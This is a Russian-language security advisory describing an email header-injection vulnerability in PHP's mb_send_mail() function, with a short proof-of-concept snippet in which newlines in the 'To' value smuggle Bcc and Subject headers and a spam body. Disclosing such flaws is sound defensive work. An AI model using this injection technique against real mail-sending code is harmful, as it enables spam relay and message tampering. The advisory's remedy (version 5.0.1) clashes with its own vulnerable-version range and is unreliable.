Security Lab

Инклюдинг произвольных заголовков в функции mb_send_mail() в PHP

Дата публикации:29.11.2005
Всего просмотров:2856
Опасность:
Средняя
Наличие исправления: Частично
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHP 5.0.x
PHP 4.4.x
Уязвимые версии: PHP 4.4.x, версии до 5.1.0

Описание:
Уязвимость позволяет удаленному пользователю обойти ограничения безопасности.

Уязвимость существует в функции "mb_send_mail()". Удаленный пользователь, контролирующий входные данные в параметр "To" уязвимой функции может внедрить в письмо произвольные заголовки. Пример:

<?php

$TO = "s.masugata@digicom.dnp.co.jp\nBcc:
s.masugata@digicom.dnp.co.jp\n".
"Subject: SPAM Subject\n\nSPAM SPAM SPAM SPAM Body";

mb_send_mail( $TO, "TEST Subject", "TEST Body" ); // NG!! mail send.
mail( $TO, "TEST Subject", "TEST Body" ); // OK!! mail not send.

?>

URL производителя: php.net

Решение: Установите последнюю версию (5.0.1) с сайта производителя.

Источник:

Ссылки: header can be injected when using mb_send_mail()